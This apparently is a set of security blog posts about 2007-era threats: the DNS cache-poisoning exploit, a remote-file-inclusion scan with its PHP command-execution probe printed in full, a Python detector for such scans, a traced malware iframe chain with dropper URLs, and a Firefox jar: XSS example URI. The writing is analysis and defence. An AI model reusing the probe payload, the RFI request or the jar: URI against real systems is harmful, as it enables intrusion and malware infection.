exploit


From akeg on Flickr - http://flickr.com/photos/akeg/

From VNUNET via Packetstorm:

H D Moore, who crafted the original DNS exploit module, said in a blog posting that an attacker managed to run the cache-poisoning attack on a server belonging to AT&T’s internet service in Austin, Texas.

As a result of the attack, servers at BreakingPoint Systems, the network security firm which employs Moore as director of security research, redirected employee machines from Google.com to a third-party site loaded with advertisements.

Apparently it caused no real damage for them, but there must be loads of other users on AT&T’s DNS servers.

I’m all for full disclosure but this is really affecting a lot of people. We are seeing a big increase in infected computers and the DNS flaw might be what’s behind this (but I have no concrete proof of it).

Anyhow, admins at larger ISPs had better get patching now if they haven’t started already.

Cheers,

Interwebz/tubes/etc.. ;)

From CNET:

On July 8, IOActive researcher Dan Kaminsky disclosed a flaw in the DNS but would not provide the details until all the affected vendors had released patches and all the systems worldwide could be patched. He figured that it would take about 30 days for that to happen.

The 30-day mark just happened to coincide with his speaking engagement at Black Hat in Las Vegas on August 6.

But on Monday, fellow Black Hat presenter Halvar Flake attacked Kaminsky’s plea that a security flaw such as this be kept a secret. Flake then proceeded to lay out what he thought the flaw was. Turns out, he was right and laid the foundation for others to create and publicize an exploit.

Other than what was linked in that article, another exploit has also been added to the Packetstorm exploit archive. Both of these are Metasploit modules, and HD Moore (founder of the Metasploit project) is listed as one of the exploits’ authors.

Cheers and happy patching!

On the 11th of December (04:17:52) I received the following request to this site:

"GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.asoc-posidonia.es/pr.txt?? HTTP/1.1"

Looks like someone is trying to exploit an RFI vulnerability in Pearl for Mambo. This particular issue was disclosed over a year ago and they are still scanning for it… Must be a lot of unpatched fish in the internet tubes…

The file that is supposed to be included is live and contains the following:

<?php
// Probe payload served from the remotely included URL: it prints a fixed
// marker (so the scanner can confirm the include worked) and then runs
// `id` through whichever command-execution function the host has enabled.
echo "549821347819481<br>";
$cmd = "id";
$eseguicmd = ex($cmd);
echo $eseguicmd . "<br>";

// Try exec(), shell_exec(), system(), passthru() and finally popen(), in
// that order; every call is prefixed with @ so errors are never displayed.
function ex($cfe) {
    $res = '';
    if (!empty($cfe)) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = "";
            while (!@feof($f)) { $res .= @fread($f, 1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;

The attacking host was:

80.237.200.81 (jam.seppenra.de)
Windows CE, Generic Gecko
Cologne, Germany, DE, 50.9333, 6.95
Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007
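Scans like the one above are easy to pick out of a web server access log, because the tell-tale sign is a query parameter whose value is itself an absolute URL. The following detector is an added example, not code from the original post: it parses Apache combined-format lines, URL-decodes each parameter (twice, to catch double encoding) and reports any that points at a remote host. The log lines, IPs and timestamps are constructed for the example; the first line reproduces the request quoted above.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed log lines (TEST-NET addresses, made-up timestamps). Line 1 is
# the Pearl for Mambo probe from the post; line 2 is benign traffic; line 3
# is a constructed, percent-encoded variant that a naive grep would miss.
SAMPLE_LOG = """\
198.51.100.7 - - [11/Dec/2007:04:17:52 +0100] "GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.asoc-posidonia.es/pr.txt?? HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
198.51.100.8 - - [11/Dec/2007:04:18:01 +0100] "GET /includes/search.php?q=hello&page=2 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Dec/2007:04:18:30 +0100] "GET /index.php?page=%68%74%74%70%3a%2f%2fattacker.invalid%2fshell.txt HTTP/1.1" 404 233 "-" "curl/7.16"
"""

# Apache combined format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)
# A parameter value that starts with a remote scheme is the RFI signature.
REMOTE_RE = re.compile(r'^\s*(https?|ftps?)://', re.IGNORECASE)


def rfi_params(target):
    """Return (param, decoded value) pairs whose value is an absolute URL."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decoded once; decode again for double encoding.
        decoded = unquote(unquote(value))
        if REMOTE_RE.match(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(text):
    """Scan access-log text and return one finding per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        for name, url in rfi_params(m.group("target")):
            findings.append({
                "ip": m.group("ip"), "ts": m.group("ts"),
                "path": urlsplit(m.group("target")).path,
                "param": name, "url": url, "status": m.group("status"),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} {f['param']} -> {f['url']} ({f['status']})")
```

Run against a real log, only the lines whose parameter values resolve to a remote URL are reported, so the output is a short list of scanning hosts, hit paths and the payload URLs they tried to include.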

What about doing some error checking to verify that the target actually contains vulnerable code? It doesn’t take much time and seems like a reasonable thing to do if you want to stay (at least a little bit) under the radar.

Anyhow, this gave me a good idea which I will present in a future post.

All involved system owners have been notified.

… and now have their pages full of malware-infecting and object-dumping <iframe>s.

Tracking the iframes, I found a series of different servers hosting the malware and exploits; the flow is as follows:

  • hxxp://boc.sbb22.com/home/index.htm (This is the inserted Iframe)
    • hxxp://boc.sbb22.com/
      • hxxp://aa.llsging.com/ww/new82.htm
        • hxxp://aa.llsging.com/a2/haha.htm
        • hxxp://aa.llsging.com/a2/pps.htm
        • hxxp://js.users.51.la/1299644.js
          • hxxp://vip2.51.la/go.asp
        • hxxp://ww4.tongji123.com/g1.aspx?id=42916235
          • hxxp://ww4.tongji123.com/s.aspx
    • hxxp://nn.mm5208.com/nn.htm
      • Not reachable at the time
    • hxxp://xx.9365.org/
      • hxxp://5.xqhgm.com/sha1.htm
        • hxxp://5.xqhgm.com/new/1.gif (ANI exploit, loads on page).
          • Downloads and runs hxxp://1.xqhgm.com/x.exe
        • hxxp://5.xqhgm.com/new/1.htm (other exploit, not investigated)
          • References hxxp://1.xqhgm.com/x.exe
        • hxxp://5.xqhgm.com/new/2.htm
          • Not reachable at the time
        • hxxp://5.xqhgm.com/new/3.htm
          • Returns empty page
        • hxxp://5.xqhgm.com/new/4.htm
          • Tries to load hxxp://3.xqhgm.com/zs.exe as an object
        • hxxp://s30.cnzz.com/stat.php?id=658703&web_id=658703
          • Seems to be a statistics engine
        • hxxp://js.users.51.la/1402795.js
          • Not reachable at the time
    • hxxp://a.2008yi.com/hu.htm
      • Not reachable at the time
    • hxxp://acc.jqxx.org/ac.htm
      • hxxp://dfs.jfkdlirjnfirpocr.com/web/6619038.htm
        • Not reachable at the time

The primary payloads of these iframed pages seem to be “x.exe” and “zs.exe”. When dumping the strings from these executables (no obfuscation used) it becomes apparent that both are droppers for a whole bunch of malware files (possibly the same files, just recompiled/packed/encrypted for AV evasion). The downloads referenced in the files were:

  • hxxp://1.xqhgm.com/1.exe
  • hxxp://1.xqhgm.com/2.exe
  • hxxp://1.xqhgm.com/3.exe
  • hxxp://1.xqhgm.com/4.exe
  • and so on up to…
  • hxxp://1.xqhgm.com/24.exe

Files “1” and “16” returned a 404 Not Found.

“23.exe” seems to be the same malware that I found some time back (see this post). As said in that post, the main infector does not want to run in my sandbox. Because of that I have not yet been able to get the pcihdd.sys rootkit component, as I do not have a computer to “waste time restoring” atm. If someone would like to infect themselves, contact me for a sample ;)

Another thing linking this infection to the other that I found is the use of the same stats engine, hxxp://s30.cnzz.com/.

Cheers and stay safe!

For those of you who have not been following the computer security news and blogs, there is a new vulnerability in town, and it’s nasty.

The problem lies in the jar: protocol implementation used by Firefox. It enables an attacker to conduct XSS and gives them almost limitless possibilities for malware hosting.

This is an example URI which exploits the issue:

jar:http://www.icmpecho.com/myjarshrine/yarihooo.jpg!/malwareloadingscript.html

Now, instead of copying others’ work, which they have probably spent hours or more on to explain the issue in full, I’ll give you a short recap of the happenings and of the increasingly revealing blog posts:

  • 2007-02-08 - Jesse Ruderman logs the bug in the Mozilla Bugzilla tracker. It remains unpatched and not widely known until…
  • 2007-11-07 - Researcher pdp discusses the issue and potential impact at GNUCitizen. This opens the bug up to a whole new audience and…
  • 2007-11-10 - Beford illustrates the seriousness of this issue and issues in the same family by targeting Google and Gmail, and posts a new bug entry.
  • 2007-11-10 - And then Mario posts at GNUCitizen about other attack vectors, including malware- and exploit-hosting.

During these last days we have also seen some very strange recommendations from leading security experts at ZDNet, Secunia and US-CERT (and one at The Register as well), as has the most excellent Giorgio over at the Hackademix blog.

The problem with the recommendations given by these persons and/or organisations is mainly that they recommend blocking URIs containing “jar:” in web filters and deep-packet-inspecting firewalls, or avoiding “jar:” links. You should understand why this would be a total waste of time if you have read the above articles, and in particular Giorgio’s comments on the issue.

You should also know why if you have ever seen one page load another, as in most web-based exploits (including the one on the Swedish Parliament’s websites this week (Swedish link, sorry)). My feeling is that the first advisories were rushed out “to be first in the corporate sector” and sloppy research took its toll.

If you do want to protect yourselves for real, you might want to download and install the NoScript extension for Firefox, which also handles jar:.

Happy times! ;)

I was doing some digging in Google a couple of days back and found an iframe which led to a site distributing a downloader:

hxxp://w.mh8888.cn/ad.htm?a

This page in turn loads almost 10 pages and scripts from different servers, including one that uses a vulnerability in Internet Explorer to download and install a downloader (it hooks it into Internet Explorer as a BHO). If I did not use a vulnerable browser, nothing happened. Many links inside the scripts relate to the domain “cnzz.com”. Anyone have more info about these guys?

Anyhow, the dropper file’s name was “get.exe” and that in turn downloaded another file called “det.exe” which was placed in C:\Program files\Internet Explorer\det.exe.

When this file was run by get.exe (btw, it would not run in my sandbox:/ ), it started downloading and installing a driver called pcihdd.sys, placing it in c:\windows\system32\drivers\ and making the required system modifications to run. It also modified the file c:\windows\system32\userinit.exe. At the time of detection I only got a handful of “related to”, “modification of” or “suspicious file” responses from http://www.virustotal.com.

The .js files responsible for the infections were obfuscated by simple encoding routines and then run through eval() statements. The binaries themselves had obfuscated only some of their internal strings; others were left unchanged. One of those strings was a link to an Asian site (hxxp://ilove.com/ttt.cer) disguised as a dating site.

All collected files, including the scripts, have been reported to the AV vendors and should be picked up by now.